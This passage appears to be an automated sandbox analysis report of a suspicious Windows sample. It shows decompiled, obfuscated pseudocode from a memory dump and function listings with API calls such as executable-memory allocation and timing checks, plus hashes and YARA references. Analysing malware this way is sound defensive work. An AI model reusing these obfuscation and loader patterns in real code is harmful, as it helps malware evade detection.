				_v1576 = _v1576 | 0x19b4cce0;
				_v1576 = _v1576 ^ 0x19baa07f;
				_v1724 = 0xbf4a96;
				_t444 = 0x5e;
				_v1724 = _v1724 / _t444;
				_v1724 = _v1724 << 6;
				_t445 = 6;
				_v1724 = _v1724 / _t445;
				_v1724 = _v1724 ^ 0x001fb8e8;
				_v1624 = 0x45a64f;
				_v1624 = _v1624 << 1;
				_v1624 = _v1624 >> 0xf;
				_v1624 = _v1624 ^ 0x000b503d;
				_v1684 = 0xb25e00;
				_v1684 = _v1684 >> 8;
				_v1684 = _v1684 ^ 0xb04bdaf3;
				_v1684 = _v1684 | 0x528abcb4;
				_v1684 = _v1684 ^ 0xf2c0da40;
				_v1716 = 0xe3eb63;
				_v1716 = _v1716 + 0x4bb4;
				_v1716 = _v1716 | 0x24706c23;
				_v1716 = _v1716 + 0xffff0bad;
				_v1716 = _v1716 ^ 0x24f80a2d;
				_v1660 = 0x9c5bdc;
				_v1660 = _v1660 | 0xcf478232;
				_v1660 = _v1660 >> 1;
				_t446 = 0xe;
				_v1660 = _v1660 / _t446;
				_v1660 = _v1660 ^ 0x076aa47c;
				_v1668 = 0xa625ec;
				_t447 = 0x7d;
				_v1668 = _v1668 / _t447;
				_v1668 = _v1668 + 0x365e;
				_v1668 = _v1668 << 0xd;
				_v1668 = _v1668 ^ 0x31544487;
				_v1708 = 0x6b5520;
				_v1708 = _v1708 + 0xf8d2;
				_v1708 = _v1708 << 9;
				_v1708 = _v1708 >> 4;
				_v1708 = _v1708 ^ 0x0d8d8c55;
				_v1600 = 0x9430bd;
				_t448 = 0x36;
				_v1600 = _v1600 / _t448;
				_v1600 = _v1600 ^ 0x000afaf2;
				_v1620 = 0x86cfb6;
				_v1620 = _v1620 << 1;
				_v1620 = _v1620 + 0xffff889a;
				_v1620 = _v1620 ^ 0x0109f82c;
				_v1564 = 0xa631e3;
				_v1564 = _v1564 + 0xf4ba;
				_v1564 = _v1564 ^ 0x00a80ade;
				_v1676 = 0x7979a8;
				_v1676 = _v1676 << 7;
				_v1676 = _v1676 << 0x10;
				_v1676 = _v1676 + 0x9d4f;
				_v1676 = _v1676 ^ 0xd402292e;
				_v1700 = 0x9cb407;
				_t449 = 0x74;
				_v1700 = _v1700 / _t449;
				_v1700 = _v1700 ^ 0xb8dd2e27;
				_v1700 = _v1700 + 0x1cb3;
				_v1700 = _v1700 ^ 0xb8dbb093;
				_v1588 = 0x57c273;
				_v1588 = _v1588 ^ 0xbac546e2;
				_v1588 = _v1588 ^ 0xba9f2ece;
				_v1652 = 0x72d309;
				_v1652 = _v1652 >> 0xf;
				_v1652 = _v1652 + 0x1eac;
				_v1652 = _v1652 ^ 0x0008e8eb;
				_v1728 = 0xc706e;
				_v1728 = _v1728 << 1;
				_v1728 = _v1728 << 0xc;
				_t450 = 0x26;
				_v1728 = _v1728 * 0x45;
				_v1728 = _v1728 ^ 0x49b77e5b;
				_v1640 = 0x7522e5;
				_t203 =  &_v1640; // 0x7522e5
				_v1640 =  *_t203 * 0x5c;
				_t205 =  &_v1640; // 0x7522e5
				_v1640 =  *_t205 / _t450;
				_v1640 = _v1640 ^ 0x0119d43e;
				_v1692 = 0xbb4804;
				_v1692 = _v1692 + 0xffff70c6;
				_v1692 = _v1692 << 0xf;
				_v1692 = _v1692 + 0x3f9;
				_v1692 = _v1692 ^ 0x5c613920;
				_v1712 = 0x28f594;
				_t451 = 0x4e;
				_v1712 = _v1712 * 0x7e;
				_v1712 = _v1712 / _t451;
				_v1712 = _v1712 | 0x51c800e0;
				_v1712 = _v1712 ^ 0x51cdbf54;
				_v1580 = 0x7adb62;
				_v1580 = _v1580 + 0x1c1;
				_v1580 = _v1580 ^ 0x0077f071;
				_v1720 = 0xc70a86;
				_v1720 = _v1720 << 7;
				_t452 = 0x56;
				_v1720 = _v1720 * 0x1f;
				_v1720 = _v1720 ^ 0x9dec4920;
				_v1720 = _v1720 ^ 0x90c44137;
				_v1704 = 0x9ba56a;
				_v1704 = _v1704 >> 0x10;
				_v1704 = _v1704 | 0x058efec6;
				_v1704 = _v1704 << 5;
				_v1704 = _v1704 ^ 0xb1d841ad;
				_v1612 = 0x4e3e19;
				_v1612 = _v1612 | 0x42034613;
				_v1612 = _v1612 + 0xa5db;
				_v1612 = _v1612 ^ 0x4251fd7d;
				_v1596 = 0xecd59;
				_v1596 = _v1596 << 0xf;
				_v1596 = _v1596 ^ 0x66a56977;
				_v1632 = 0xfd16cc;
				_v1632 = _v1632 >> 0x10;
				_v1632 = _v1632 | 0xf759e487;
				_v1632 = _v1632 ^ 0xf75ce35e;
				_v1568 = 0xf13a15;
				_v1568 = _v1568 + 0xffffe5fa;
				_v1568 = _v1568 ^ 0x00f08e2f;
				_v1696 = 0xb25c71;
				_v1696 = _v1696 >> 5;
				_v1696 = _v1696 + 0xffff6fed;
				_v1696 = _v1696 | 0x9a7ee50f;
				_v1696 = _v1696 ^ 0x9a75ce05;
				_v1584 = 0xd4d15a;
				_v1584 = _v1584 | 0xed45407c;
				_v1584 = _v1584 ^ 0xedd29953;
				_v1648 = 0x645714;
				_v1648 = _v1648 / _t452;
				_v1648 = _v1648 ^ 0xa5463a61;
				_v1648 = _v1648 ^ 0xa540957b;
				_v1592 = 0x7bc2a2;
				_v1592 = _v1592 | 0xe79bdf7f;
				_v1592 = _v1592 ^ 0xe7f9ba68;
				_v1608 = 0xeb425b;
				_v1608 = _v1608 | 0x6f37f89f;
				_v1608 = _v1608 ^ 0x6ff0358e;
				_v1616 = 0xd90b05;
				_v1616 = _v1616 + 0x5fe2;
				_v1616 = _v1616 + 0xb3d9;
				_v1616 = _v1616 ^ 0x00d0b302;
				_v1628 = 0x5d6f98;
				_v1628 = _v1628 ^ 0x53a08d2a;
				_t453 = 0x1a;
				_v1628 = _v1628 * 0x15;
				_v1628 = _v1628 ^ 0xe3d40ccf;
				_v1656 = 0x3ffc42;
				_v1656 = _v1656 | 0xeccb51bd;
				_v1656 = _v1656 >> 5;
				_v1656 = _v1656 / _t453;
				_v1656 = _v1656 ^ 0x004cf9e1;
				_v1604 = 0xad51da;
				_v1604 = _v1604 + 0xffffadf7;
				_v1604 = _v1604 ^ 0x00a3928b;
				_t498 = _v1604;
				while(_t492 != 0x1e2f185) {
					if(_t492 == 0x2b93872) {
						_t498 = E001C7E66();
						_t492 = 0x31259bb;
						continue;
					}
					if(_t492 == 0x31259bb) {
						_t429 = _t498;
						__eflags =  *_t498 - _t442;
						if(__eflags == 0) {
							L17:
							_t492 = 0xc3103c3;
							continue;
						} else {
							goto L10;
						}
						do {
							L10:
							__eflags =  *_t429 - 0x2c;
							if( *_t429 != 0x2c) {
								goto L16;
							}
							_t491 =  &_v1560;
							while(1) {
								_t429 =  &(_t429[1]);
								_t461 =  *_t429 & 0x0000ffff;
								__eflags = _t461;
								if(_t461 == 0) {
									break;
								}
								__eflags = _t461 - 0x20;
								if(_t461 == 0x20) {
									break;
								}
								 *_t491 = _t461;
								_t491 =  &(_t491[0]);
								__eflags = _t491;
							}
							_t453 = 0;
							__eflags = 0;
							 *_t491 = 0;
							L16:
							_t429 =  &(_t429[1]);
							__eflags =  *_t429 - _t442;
						} while (__eflags != 0);
						goto L17;
					}
					if(_t492 == 0x735677c) {
						_push(_t453);
						E001DEA55(_t498, _v1608, __eflags, _v1616, _t442, _v1628, _t442, _v1656, _v1604, _t442);
						_t442 = 1;
						__eflags = 1;
						L23:
						return _t442;
					}
					if(_t492 == 0x849210b) {
						E001CB3B4(_v1564, _t453, _v1676, _t453, _v1700,  &_v1040, _v1588, _v1572);
						E001D855C( &_v520, _v1652, __eflags, _v1728, _v1640, _v1564, _v1692);
						_push(_v1720);
						_push(_v1580);
						E001D2EA5( &_v520, __eflags,  &_v1040, 0x1c10f0, _v1612, _v1596, E001DCD35(0x1c10f0, _v1712, __eflags), _v1632, _v1568, _t498);
						_t453 = _v1696;
						E001D629F(_t453, _t435, _v1584, _v1648, _v1592);
						_t499 =  &(_t499[0x18]);
						_t492 = 0x735677c;
						continue;
					}
					_t509 = _t492 - 0xc3103c3;
					if(_t492 == 0xc3103c3) {
						_push(_v1624);
						_push(_v1724);
						_t440 = E001C2C3A(_v1684,  &_v1560, _v1716, E001DCD35(0x1c1070, _v1576, _t509), _v1660); // executed
						_t453 = _v1668;
						asm("sbb edi, edi");
						_t492 = ( ~_t440 & 0xfc429d7e) + 0xc06838d;
						E001D629F(_t453, _t439, _v1708, _v1600, _v1620);
						_t499 =  &(_t499[8]);
					}
					L20:
					if(_t492 != 0xc06838d) {
						continue;
					}
					goto L23;
				}
				_t453 = _v1664;
				E001D365D(_t453,  &_v1560, _v1672, 0x208, _v1636, _v1644);
				_t499 =  &(_t499[4]);
				_t492 = 0x2b93872;
				goto L20;
			}


































































                          0x001e1291
                          0x001e1297
                          0x001e12a4
                          0x001e12af
                          0x001e12ba
                          0x001e12c2
                          0x001e12ca
                          0x001e12cf
                          0x001e12d7
                          0x001e12df
                          0x001e12e7
                          0x001e12ec
                          0x001e12fa
                          0x001e12fe
                          0x001e1300
                          0x001e1308
                          0x001e130d
                          0x001e1315
                          0x001e131d
                          0x001e1325
                          0x001e132d
                          0x001e1335
                          0x001e133d
                          0x001e1341
                          0x001e1349
                          0x001e1351
                          0x001e1359
                          0x001e135e
                          0x001e1366
                          0x001e136e
                          0x001e1376
                          0x001e137b
                          0x001e1383
                          0x001e1388
                          0x001e1390
                          0x001e139b
                          0x001e13a6
                          0x001e13b1
                          0x001e13bf
                          0x001e13c4
                          0x001e13ca
                          0x001e13d3
                          0x001e13d8
                          0x001e13de
                          0x001e13e6
                          0x001e13ee
                          0x001e13f2
                          0x001e13f7
                          0x001e13ff
                          0x001e1407
                          0x001e140c
                          0x001e1414
                          0x001e141c
                          0x001e1424
                          0x001e142c
                          0x001e1434
                          0x001e143c
                          0x001e1444
                          0x001e144c
                          0x001e1454
                          0x001e145c
                          0x001e1464
                          0x001e1467
                          0x001e146b
                          0x001e1473
                          0x001e1483
                          0x001e1488
                          0x001e148e
                          0x001e1496
                          0x001e149b
                          0x001e14a3
                          0x001e14ab
                          0x001e14b3
                          0x001e14b8
                          0x001e14bd
                          0x001e14c5
                          0x001e14d7
                          0x001e14dc
                          0x001e14e5
                          0x001e14f0
                          0x001e14fb
                          0x001e1502
                          0x001e150d
                          0x001e1518
                          0x001e1523
                          0x001e152e
                          0x001e1539
                          0x001e1541
                          0x001e1546
                          0x001e154b
                          0x001e1553
                          0x001e155b
                          0x001e1567
                          0x001e156c
                          0x001e1572
                          0x001e157a
                          0x001e1582
                          0x001e158a
                          0x001e1595
                          0x001e15a0
                          0x001e15ab
                          0x001e15b3
                          0x001e15b8
                          0x001e15c0
                          0x001e15c8
                          0x001e15d0
                          0x001e15d4
                          0x001e15de
                          0x001e15e1
                          0x001e15e5
                          0x001e15ed
                          0x001e15f5
                          0x001e15fa
                          0x001e15fe
                          0x001e1606
                          0x001e160a
                          0x001e1612
                          0x001e161a
                          0x001e1622
                          0x001e1627
                          0x001e162f
                          0x001e1637
                          0x001e1644
                          0x001e1645
                          0x001e164f
                          0x001e1653
                          0x001e165d
                          0x001e1665
                          0x001e1670
                          0x001e167b
                          0x001e1686
                          0x001e168e
                          0x001e169a
                          0x001e169d
                          0x001e16a1
                          0x001e16a9
                          0x001e16b1
                          0x001e16b9
                          0x001e16be
                          0x001e16c6
                          0x001e16cb
                          0x001e16d3
                          0x001e16de
                          0x001e16e9
                          0x001e16f4
                          0x001e16ff
                          0x001e170a
                          0x001e1712
                          0x001e171d
                          0x001e1725
                          0x001e172a
                          0x001e1732
                          0x001e173a
                          0x001e1745
                          0x001e1750
                          0x001e175b
                          0x001e1763
                          0x001e1768
                          0x001e1770
                          0x001e1778
                          0x001e1780
                          0x001e178b
                          0x001e1796
                          0x001e17a1
                          0x001e17b1
                          0x001e17b5
                          0x001e17bd
                          0x001e17c5
                          0x001e17d0
                          0x001e17db
                          0x001e17e6
                          0x001e17f1
                          0x001e17fc
                          0x001e1807
                          0x001e1812
                          0x001e181d
                          0x001e1828
                          0x001e1833
                          0x001e183b
                          0x001e1848
                          0x001e1849
                          0x001e184d
                          0x001e1855
                          0x001e185d
                          0x001e1865
                          0x001e1870
                          0x001e1874
                          0x001e187c
                          0x001e1887
                          0x001e1892
                          0x001e189d
                          0x001e18a4
                          0x001e18b6
                          0x001e1a70
                          0x001e1a72
                          0x00000000
                          0x001e1a72
                          0x001e18c2
                          0x001e1a1e
                          0x001e1a20
                          0x001e1a24
                          0x001e1a59
                          0x001e1a59
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x001e1a26
                          0x001e1a26
                          0x001e1a26
                          0x001e1a2a
                          0x00000000
                          0x00000000
                          0x001e1a2c
                          0x001e1a41
                          0x001e1a41
                          0x001e1a44
                          0x001e1a47
                          0x001e1a4a
                          0x00000000
                          0x00000000
                          0x001e1a35
                          0x001e1a39
                          0x00000000
                          0x00000000
                          0x001e1a3b
                          0x001e1a3e
                          0x001e1a3e
                          0x001e1a3e
                          0x001e1a4c
                          0x001e1a4c
                          0x001e1a4e
                          0x001e1a51
                          0x001e1a51
                          0x001e1a54
                          0x001e1a54
                          0x00000000
                          0x001e1a26
                          0x001e18ce
                          0x001e1ab3
                          0x001e1ad9
                          0x001e1ae3
                          0x001e1ae3
                          0x001e1ae7
                          0x001e1af0
                          0x001e1af0
                          0x001e18da
                          0x001e197a
                          0x001e199a
                          0x001e199f
                          0x001e19a8
                          0x001e19ec
                          0x001e1a08
                          0x001e1a0c
                          0x001e1a11
                          0x001e1a14
                          0x00000000
                          0x001e1a14
                          0x001e18dc
                          0x001e18e2
                          0x001e18e8
                          0x001e18f1
                          0x001e1917
                          0x001e1934
                          0x001e1938
                          0x001e1940
                          0x001e1946
                          0x001e194b
                          0x001e194b
                          0x001e1aa5
                          0x001e1aab
                          0x00000000
                          0x00000000
                          0x00000000
                          0x001e1ab1
                          0x001e1a94
                          0x001e1a98
                          0x001e1a9d
                          0x001e1aa0
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 9a\$ Uk$#lp$$[B$^6$|@E$"u$_
                          • API String ID: 0-1868176208
                          • Opcode ID: eeee5ffd8a1ddff3a3b20d1048e4a7240db599e17bf1141b6ebc4f0fe1a84f8b
                          • Instruction ID: cac967ff7f70d80aa78d7c7de622b01d028a43ba8097fbe332ed2715dcf71856
                          • Opcode Fuzzy Hash: eeee5ffd8a1ddff3a3b20d1048e4a7240db599e17bf1141b6ebc4f0fe1a84f8b
                          • Instruction Fuzzy Hash: 8E1210725093809FD368CF21C58AA8FBBE2FBD5758F10891DE1DA86261D7B58948DF03
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4B9990, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 394filememoryCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(asd,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E4B9B65
                          • GetLastError.KERNEL32 ref: 6E4B9B6B
                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 6E4B9B87
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocCreateErrorFileLastVirtual
                          • String ID: asd
                          • API String ID: 1112224254-4170839921
                          • Opcode ID: 1713bb399cf92f508ecbbc33bff30b82480a5719b9a47477d352eec20cf4a702
                          • Instruction ID: 20ca40f995362daf518a9fd15e8c2d02e31face85624ed15232723a49ef1a0d1
                          • Opcode Fuzzy Hash: 1713bb399cf92f508ecbbc33bff30b82480a5719b9a47477d352eec20cf4a702
                          • Instruction Fuzzy Hash: 02E1FF31A083068FCB50CFA9C880B1AB7F0FF99704F15496EEA558B345D772E855CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4A1290, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 136memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 6E4B97A0: GetTickCount64.KERNEL32 ref: 6E4B97D6
                            • Part of subcall function 6E4B97A0: GetTickCount64.KERNEL32 ref: 6E4B97F4
                            • Part of subcall function 6E4B97A0: GetTickCount64.KERNEL32 ref: 6E4B980D
                            • Part of subcall function 6E4B97A0: GetTickCount64.KERNEL32 ref: 6E4B980F
                            • Part of subcall function 6E4B97A0: GetTickCount64.KERNEL32 ref: 6E4B9816
                            • Part of subcall function 6E4B97A0: GetTickCount64.KERNEL32 ref: 6E4B9834
                          • GetProcessHeap.KERNEL32 ref: 6E4A1337
                          • HeapAlloc.KERNEL32(005B0000,00000000,00023000), ref: 6E4A1351
                          • HeapFree.KERNEL32(00000000,?), ref: 6E4A1435
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Count64Tick$Heap$AllocFreeProcess
                          • String ID: '`Ly
                          • API String ID: 2047189075-560155178
                          • Opcode ID: 64c654ad64672d5d1e7c2a813d5bf266227375016a145ac3d1fa86f44001c53a
                          • Instruction ID: 3357460f67f72b639b1ba7c022e3f58c41265d1aab8560783a4b07821fe0af51
                          • Opcode Fuzzy Hash: 64c654ad64672d5d1e7c2a813d5bf266227375016a145ac3d1fa86f44001c53a
                          • Instruction Fuzzy Hash: E8518974604B408BD3248F79D880F56BBF5FF99318F108A2ED9968BB85E734F5058B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4BA21B, Relevance: 10.6, APIs: 7, Instructions: 136COMMON
                          Download Yara Rule
                          APIs
                          • __RTC_Initialize.LIBCMT ref: 6E4BA262
                          • ___scrt_uninitialize_crt.LIBCMT ref: 6E4BA27C
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Initialize___scrt_uninitialize_crt
                          • String ID:
                          • API String ID: 2442719207-0
                          • Opcode ID: 86f2c15919145d9a48aaebf59122609adf4b6841ce0831ff1753c52400d897c3
                          • Instruction ID: 7308b9b2ffb2d0f7b98c7b35ea13e7f6db2ccfe5caf0fa4278444f29f1c5d392
                          • Opcode Fuzzy Hash: 86f2c15919145d9a48aaebf59122609adf4b6841ce0831ff1753c52400d897c3
                          • Instruction Fuzzy Hash: 8C41BE72D04614ABDB118FF8C800FAE3AB9EF81B94F00491BE81566340D3718952BBF0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4BA2CB, Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: dllmain_raw$dllmain_crt_dispatch
                          • String ID:
                          • API String ID: 3136044242-0
                          • Opcode ID: b11f3bef7f0f812b0f5861c2940487cd785ff14acfb5e19bc2e2fa73b74e0ec1
                          • Instruction ID: 28860cd270853e3ba620cd95c2aa56ae648d3599bfeb63c3c22f4bd9776bf63b
                          • Opcode Fuzzy Hash: b11f3bef7f0f812b0f5861c2940487cd785ff14acfb5e19bc2e2fa73b74e0ec1
                          • Instruction Fuzzy Hash: 1D217A72D00619ABDB618EF9C840EAF3A6AEF81B94B01451BEC2567310D3318D52ABF0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4AC460, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNELBASE(api-ms-win-core-synch-l1-2-0), ref: 6E4AC465
                          • GetProcAddress.KERNEL32(00000000,WakeByAddressSingle), ref: 6E4AC475
                          Strings
                          • WakeByAddressSingle, xrefs: 6E4AC46F
                          • api-ms-win-core-synch-l1-2-0, xrefs: 6E4AC460
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: WakeByAddressSingle$api-ms-win-core-synch-l1-2-0
                          • API String ID: 1646373207-1731903895
                          • Opcode ID: 5d1b83b3718c5a7d82fcd5b2a2aad43bd6c7d2abcbe721b0d378e79cdff15022
                          • Instruction ID: 9ad47f78d6ecf7ac2e89fec8cb5c5bb77c154cdb91241444ea9d4d1096ce0d80
                          • Opcode Fuzzy Hash: 5d1b83b3718c5a7d82fcd5b2a2aad43bd6c7d2abcbe721b0d378e79cdff15022
                          • Instruction Fuzzy Hash: AEB012B564894167DED4FFF35D0CE173928ABDEA2770245967292DF681CA20D000ED31
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4AC4E0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNELBASE(api-ms-win-core-synch-l1-2-0), ref: 6E4AC4E5
                          • GetProcAddress.KERNEL32(00000000,WaitOnAddress), ref: 6E4AC4F5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: WaitOnAddress$api-ms-win-core-synch-l1-2-0
                          • API String ID: 1646373207-1891578837
                          • Opcode ID: a5ed7c405bb12941112bbfc4b08a2e05dc7fa5365419138a745102b498fb9564
                          • Instruction ID: 53b62131f264cbc3224e6bdd70579db2e34ad254ab2453d784bb33e248da684c
                          • Opcode Fuzzy Hash: a5ed7c405bb12941112bbfc4b08a2e05dc7fa5365419138a745102b498fb9564
                          • Instruction Fuzzy Hash: B8B09275608942669EA4BEF35D0CE263928ABA9A2B70285566552EA685CA20E000AD21
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4C1AA1, Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                          Download Yara Rule
                          APIs
                          • GetEnvironmentStringsW.KERNEL32 ref: 6E4C1AA9
                            • Part of subcall function 6E4C19B3: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6E4C3B22,?,00000000,-00000008), ref: 6E4C1A5F
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E4C1AE1
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E4C1B01
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                          • String ID:
                          • API String ID: 158306478-0
                          • Opcode ID: 67f97c1b6cd482b69a5ee7b4a6d53dbe87dcf643e51da27ddc11235580cb6d68
                          • Instruction ID: 549ece053d266ebb910f594ce7c18b1a92997b982a19b7f1bfc52da73f2664d1
                          • Opcode Fuzzy Hash: 67f97c1b6cd482b69a5ee7b4a6d53dbe87dcf643e51da27ddc11235580cb6d68
                          • Instruction Fuzzy Hash: F611E1ED5055197F6B0167F65C8DCAF69BCDE4AA98300082BF50593301FE60EE0585F2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4BA114, Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                          Download Yara Rule
                          APIs
                          • __RTC_Initialize.LIBCMT ref: 6E4BA161
                            • Part of subcall function 6E4BA7ED: InitializeSListHead.KERNEL32(6E4FB140,6E4BA16B,6E4F7D60,00000010,6E4BA0FC,?,?,?,6E4BA324,?,00000001,?,?,00000001,?,6E4F7DA8), ref: 6E4BA7F2
                          • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E4BA1CB
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                          • String ID:
                          • API String ID: 3231365870-0
                          • Opcode ID: c3afb07ce63a7397ad32a3b544d1d84fe39e20a85a1601e566d7b59a477a88b3
                          • Instruction ID: c6b11454c1c39999187c31dfafdf0f7145ec00d1d6bb9d34dffe111ff328b62b
                          • Opcode Fuzzy Hash: c3afb07ce63a7397ad32a3b544d1d84fe39e20a85a1601e566d7b59a477a88b3
                          • Instruction Fuzzy Hash: 8D2102319886859ADF90ABF4A904FDC37A59F06A6CF104C0FC4652B3C1DB722056F6F2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4C209C, Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                          Download Yara Rule
                          APIs
                          • GetStdHandle.KERNEL32(000000F6), ref: 6E4C20E8
                          • GetFileType.KERNELBASE(00000000), ref: 6E4C20FA
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FileHandleType
                          • String ID:
                          • API String ID: 3000768030-0
                          • Opcode ID: ce38abd63cbebbf0b273541b58067b53f70fe7b98774eb1628adb9249079a99c
                          • Instruction ID: a3be56663488c8dcbf4bfb47a9c7ba40caeb6102fcf8d6d80ae6ac0f671dfd50
                          • Opcode Fuzzy Hash: ce38abd63cbebbf0b273541b58067b53f70fe7b98774eb1628adb9249079a99c
